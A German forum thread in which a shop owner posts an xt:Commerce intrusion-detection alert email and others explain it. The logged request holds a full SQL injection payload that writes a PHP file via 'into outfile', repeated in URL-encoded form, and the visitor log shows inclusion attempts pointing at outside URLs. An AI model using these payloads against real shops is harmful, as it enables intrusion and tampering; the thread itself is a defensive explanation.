Was ist das: Attempted hack on your site? (type: Intrusion detection.)

[melinda*at]

Hallo,

Mein Shop ist jetzt offline.
Gestern Abend sind 160 Mails, dann heute als ich mein PC eingeschaltet habe ca. 280 Attempted hack on your site? (type: Intrusion detection.) gekommen...beide male haben wir den Shop gleich unerreichbar macht.

Mailinhalt:


Attention site admin of Melinda Silbermode, On DATE_FORMAT_LONG at DATE_TIME_FORMAT_SHORT the xt:C System has detected that somebody tried to send information to your site that may have been intended as a hack. Do not panic, it may be harmless: maybe this detection was triggered by something you did! Anyway, it was detected and blocked. The suspicious activity was recognized in /homepages/46/d132898374/htdocs/silber/inc/xtc_Security.inc.php on line 68, and is of the type xt:C Security Alert. Additional information given by the code which detected this: Intrusion detection. Below you will find a lot of information obtained about this attempt, that may help you to find what happened and maybe who did it. ===================================== Information about this user: ===================================== This person is not logged in. IP numbers: [note: when you are dealing with a real cracker these IP numbers might not be from the actual computer he is working on] IP according to HTTP_CLIENT_IP: IP according to REMOTE_ADDR: 80.64.198.5 IP according to GetHostByName(80.64.198.5): 80.64.198.5 ===================================== Information in the $_REQUEST array ===================================== REQUEST * cPath : 29 union select null,null,null,\'just_a_test_4_ \' into outfile \'/homepages/46/d132898374/htdocs/silber/includes/classes/Smarty_2.6.6/jatest.php\' REQUEST * XTCsid : b653f6158df212286fd33472bd461f19 ===================================== Information in the $_GET array This is about variables that may have been in the URL string or in a 'GET' type form. ===================================== GET * cPath : 29 union select null,null,null,\'just_a_test_4_ \' into outfile \'/homepages/46/d132898374/htdocs/silber/includes/classes/Smarty_2.6.6/jatest.php\' GET * XTCsid : b653f6158df212286fd33472bd461f19 ===================================== Information in the $_POST array This is about visible and invisible form elements. ===================================== ===================================== Browser information ===================================== HTTP_USER_AGENT: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) BROWSER * browser_name_regex : ^mozilla/4\.0 (compatible; msie 7\.0.*;.*windows nt 5\.1.*\.net clr 1.*).*$ BROWSER * browser_name_pattern : Mozilla/4.0 (compatible; MSIE 7.0*;*Windows NT 5.1*.NET CLR 1*)* BROWSER * parent : IE 7.0 BROWSER * platform : WinXP BROWSER * netclr : 1 BROWSER * browser : IE BROWSER * version : 7.0 BROWSER * majorver : 7 BROWSER * minorver : 0 BROWSER * css : 2 BROWSER * frames : 1 BROWSER * iframes : 1 BROWSER * tables : 1 BROWSER * cookies : 1 BROWSER * backgroundsounds : 1 BROWSER * vbscript : 1 BROWSER * javascript : 1 BROWSER * javaapplets : 1 BROWSER * activexcontrols : 1 BROWSER * cdf : 1 BROWSER * aol : BROWSER * beta : 1 BROWSER * win16 : BROWSER * crawler : BROWSER * stripper : BROWSER * wap : BROWSER * ismobiledevice : BROWSER * ak : BROWSER * sk : ===================================== Information in the $_SERVER array ===================================== SERVER * DBENTRY : /kunden/homepages/46/d132898374/htdocs:d0000#CPU 6 #MEM 10240 #CGI 278 #NPROC 12 #TAID 38554849 #WERB 0 #LANG 0 #PARKING 1 #STAT 1 SERVER * DOCUMENT_ROOT : /kunden/homepages/46/d132898374/htdocs SERVER * HTTP_ACCEPT : image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* SERVER * HTTP_ACCEPT_LANGUAGE : en-us SERVER * HTTP_CONNECTION : Close SERVER * HTTP_HOST : www.melinda.at SERVER * HTTP_UA_CPU : x86 SERVER * HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) SERVER * PATH : /bin:/usr/bin SERVER * REDIRECT_DBENTRY : /kunden/homepages/46/d132898374/htdocs:d0000#CPU 6 #MEM 10240 #CGI 278 #NPROC 12 #TAID 38554849 #WERB 0 #LANG 0 #PARKING 1 #STAT 1 SERVER * REDIRECT_QUERY_STRING : cPath=29%20union%20select%20null%2Cnull%2Cnull%2C% 27just_a_test_4_%20%3C%3Fphp%20echo%28md5%28%22jus t_a_test%22%29%29%3B%20echo%28%40unlink%28%22%2Fho mepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincl udes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%22%29%2 0%3F%20%22un%22.%22linked%22%20%3A%20%22not_un%22. %22linked%22%29%20%3F%3E%27%20into%20outfile%20%27 %2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2 Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%27 &XTCsid=b653f6158df212286fd33472bd461f19 SERVER * REDIRECT_SCRIPT_URI : http://www.melinda.at/silber/index.php SERVER * REDIRECT_SCRIPT_URL : /silber/index.php SERVER * REDIRECT_STATUS : 200 SERVER * REDIRECT_UNIQUE_ID : SFgAXNTjd6gAAHvjDFs SERVER * REDIRECT_URL : /silber/index.php SERVER * REMOTE_ADDR : 80.64.198.5 SERVER * REMOTE_PORT : 40815 SERVER * SCRIPT_FILENAME : /kunden/homepages/46/d132898374/htdocs/silber/index.php SERVER * SCRIPT_URI : http://www.melinda.at/silber/index.php SERVER * SCRIPT_URL : /silber/index.php SERVER * SERVER_ADDR : 82.165.87.12 SERVER * SERVER_ADMIN : webmaster@melinda.at SERVER * SERVER_NAME : melinda.at SERVER * SERVER_PORT : 80 SERVER * SERVER_SIGNATURE : SERVER * SERVER_SOFTWARE : Apache/1.3.34 Ben-SSL/1.55 SERVER * UNIQUE_ID : SFgAXNTjd6gAAHvjDFs SERVER * GATEWAY_INTERFACE : CGI/1.1 SERVER * SERVER_PROTOCOL : HTTP/1.0 SERVER * REQUEST_METHOD : GET SERVER * QUERY_STRING : cPath=29%20union%20select%20null%2Cnull%2Cnull%2C% 27just_a_test_4_%20%3C%3Fphp%20echo%28md5%28%22jus t_a_test%22%29%29%3B%20echo%28%40unlink%28%22%2Fho mepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincl udes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%22%29%2 0%3F%20%22un%22.%22linked%22%20%3A%20%22not_un%22. %22linked%22%29%20%3F%3E%27%20into%20outfile%20%27 %2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2 Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%27 &XTCsid=b653f6158df212286fd33472bd461f19 SERVER * REQUEST_URI : /silber/index.php?cPath=29%20union%20select%20null%2Cnull% 2Cnull%2C%27just_a_test_4_%20%3C%3Fphp%20echo%28md 5%28%22just_a_test%22%29%29%3B%20echo%28%40unlink% 28%22%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsil ber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.p hp%22%29%20%3F%20%22un%22.%22linked%22%20%3A%20%22 not_un%22.%22linked%22%29%20%3F%3E%27%20into%20out file%20%27%2Fhomepages%2F46%2Fd132898374%2Fhtdocs% 2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjat est.php%27&XTCsid=b653f6158df212286fd33472bd461f19 SERVER * SCRIPT_NAME : /silber/index.php SERVER * PATH_INFO : /silber/index.php SERVER * PATH_TRANSLATED : /kunden/homepages/46/d132898374/htdocs/silber/index.php SERVER * STATUS : 200 SERVER * PHP_SELF : /silber/index.php SERVER * argv : Array SERVER * argc : 1 ===================================== Information in the $_ENV array ===================================== ENV * DBENTRY : /kunden/homepages/46/d132898374/htdocs:d0000#CPU 6 #MEM 10240 #CGI 278 #NPROC 12 #TAID 38554849 #WERB 0 #LANG 0 #PARKING 1 #STAT 1 ENV * DOCUMENT_ROOT : /kunden/homepages/46/d132898374/htdocs ENV * HTTP_ACCEPT : image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* ENV * HTTP_ACCEPT_LANGUAGE : en-us ENV * HTTP_CONNECTION : Close ENV * HTTP_HOST : www.melinda.at ENV * HTTP_UA_CPU : x86 ENV * HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) ENV * PATH : /bin:/usr/bin ENV * REDIRECT_DBENTRY : /kunden/homepages/46/d132898374/htdocs:d0000#CPU 6 #MEM 10240 #CGI 278 #NPROC 12 #TAID 38554849 #WERB 0 #LANG 0 #PARKING 1 #STAT 1 ENV * REDIRECT_QUERY_STRING : cPath=29%20union%20select%20null%2Cnull%2Cnull%2C% 27just_a_test_4_%20%3C%3Fphp%20echo%28md5%28%22jus t_a_test%22%29%29%3B%20echo%28%40unlink%28%22%2Fho mepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincl udes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%22%29%2 0%3F%20%22un%22.%22linked%22%20%3A%20%22not_un%22. %22linked%22%29%20%3F%3E%27%20into%20outfile%20%27 %2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2 Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%27 &XTCsid=b653f6158df212286fd33472bd461f19 ENV * REDIRECT_SCRIPT_URI : http://www.melinda.at/silber/index.php ENV * REDIRECT_SCRIPT_URL : /silber/index.php ENV * REDIRECT_STATUS : 200 ENV * REDIRECT_UNIQUE_ID : SFgAXNTjd6gAAHvjDFs ENV * REDIRECT_URL : /silber/index.php ENV * REMOTE_ADDR : 80.64.198.5 ENV * REMOTE_PORT : 40815 ENV * SCRIPT_FILENAME : /kunden/homepages/46/d132898374/htdocs/silber/index.php ENV * SCRIPT_URI : http://www.melinda.at/silber/index.php ENV * SCRIPT_URL : /silber/index.php ENV * SERVER_ADDR : 82.165.87.12 ENV * SERVER_ADMIN : webmaster@melinda.at ENV * SERVER_NAME : melinda.at ENV * SERVER_PORT : 80 ENV * SERVER_SIGNATURE : ENV * SERVER_SOFTWARE : Apache/1.3.34 Ben-SSL/1.55 ENV * UNIQUE_ID : SFgAXNTjd6gAAHvjDFs ENV * GATEWAY_INTERFACE : CGI/1.1 ENV * SERVER_PROTOCOL : HTTP/1.0 ENV * REQUEST_METHOD : GET ENV * QUERY_STRING : cPath=29%20union%20select%20null%2Cnull%2Cnull%2C% 27just_a_test_4_%20%3C%3Fphp%20echo%28md5%28%22jus t_a_test%22%29%29%3B%20echo%28%40unlink%28%22%2Fho mepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2Fincl udes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%22%29%2 0%3F%20%22un%22.%22linked%22%20%3A%20%22not_un%22. %22linked%22%29%20%3F%3E%27%20into%20outfile%20%27 %2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsilber%2 Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.php%27 &XTCsid=b653f6158df212286fd33472bd461f19 ENV * REQUEST_URI : /silber/index.php?cPath=29%20union%20select%20null%2Cnull% 2Cnull%2C%27just_a_test_4_%20%3C%3Fphp%20echo%28md 5%28%22just_a_test%22%29%29%3B%20echo%28%40unlink% 28%22%2Fhomepages%2F46%2Fd132898374%2Fhtdocs%2Fsil ber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjatest.p hp%22%29%20%3F%20%22un%22.%22linked%22%20%3A%20%22 not_un%22.%22linked%22%29%20%3F%3E%27%20into%20out file%20%27%2Fhomepages%2F46%2Fd132898374%2Fhtdocs% 2Fsilber%2Fincludes%2Fclasses%2FSmarty_2.6.6%2Fjat est.php%27&XTCsid=b653f6158df212286fd33472bd461f19 ENV * SCRIPT_NAME : /silber/index.php ENV * PATH_INFO : /silber/index.php ENV * PATH_TRANSLATED : /kunden/homepages/46/d132898374/htdocs/silber/index.php ENV * STATUS : 200 ===================================== Information in the $_COOKIE array ===================================== ===================================== Information in the $_FILES array ===================================== ===================================== Information in the $_SESSION array This is session info.=====================================



zur Zeit waren Online lt. Shop:

Online ID Name IP Adresse Startzeit Letzter Klick Letzte URL
00:06:54 0 Guest 80.64.198.5 20:19:27 20:19:27 /silber/shop_content.php?coID=2&XTCsid=http%3A%2F%2Fwww.qu bestun
00:06:55 0 Guest 80.64.198.5 20:19:26 20:19:26 /silber/shop_content.php?coID=2&XTCsid=http%3A%2F%2Fwww.cl ubnata
00:06:55 0 Guest 80.64.198.5 20:19:26 20:19:26 /silber/shop_content.php?coID=2&XTCsid=http%3A%2F%2Frabotn itsa.r
00:07:00 0 Guest 80.64.198.5 20:19:21 20:21:41 /silber/product_info.php?cPath=29&products_id=134&
00:06:45 0 Guest 88.117.54.115 20:19:36 20:19:51 /silber/product_info.php?products_id=103&cPath=30
00:04:45 0 Guest 80.64.198.5 20:21:36 20:21:44 /silber/create_guest_account.php?

und natürlich ich war online...

wäre für jede Hilfe sehr dankbar...

lieben Gruß an Alle!

[John Steed]

Hallo Melinda,


offenbar scheint sich Dein Problem ja insofern erledigt haben, dass Du gar keinen xt:Commerce-Shop mehr benutzt (oder zumindest einen überaus vielfältig umgebauten...)

Nur als Erklärung, falls noch andere Leute (wie ich) zufällig auf diesen Thread stossen:

Die Mails wurden vom internen "Türsteher" des Shops versendet, der viele Einbruchsversuche in den Shop verhindert und dann den Admin per Mail informiert.

In Deinem Fall hat tatsächlich jemand versucht, über eine präparierte URL ohne Berechtigung Inhalte aus der Datenbank auszulesen und in eine Datei zu schreiben, die nicht zur Installation gehört (includes/classes/Smarty_2.6.6/jatest.php - vielleicht wurde zuvor schon eingebrochen und diese Datei hinterlegt).

Woran ich das erkenne? An der Info, die im sog. GET-Array steht:

Code:

union select null,null,null,\'just_a_test_4_ \' into outfile \'/homepages/xx/xxxxxx/htdocs/silber/includes/classes/Smarty_2.6.6/jatest.php\'

Ist eine von aussen eingeschleuste Datenbankabfrage - sowas nennt man SQL-Injection. Wenn's funktioniert, kann der böse Cracker alles mit Deiner Datenbank anstellen. Wenn Du die o.g. Mail bekommst, hat's nicht funktioniert

Da Du 160 Mails bekommen hast, war das wohl ein böser Bot, der 160x ins Leere gelaufen ist. Also zunächst mal Glück gehabt... Was jetzt nicht heissen soll, dass dieser Mechanismus 100%igen Schutz bietet!

Cheers,
IaN

[melinda*at]

DANKE!!! auch wenn verspätet :-)
Mein Verdacht war damals genau richtig...
Jetzt haben "die" mein Gutscheinsystem ruhiniert....
Gibt es überhaupt sicheres Shop-System?

lieben Gruß!

[AzgP]

XTC ist doch ganz sicher, Schwachpunkte sind halt zusätzliche Addons, die gerne mal ne Lücke aufreissen können.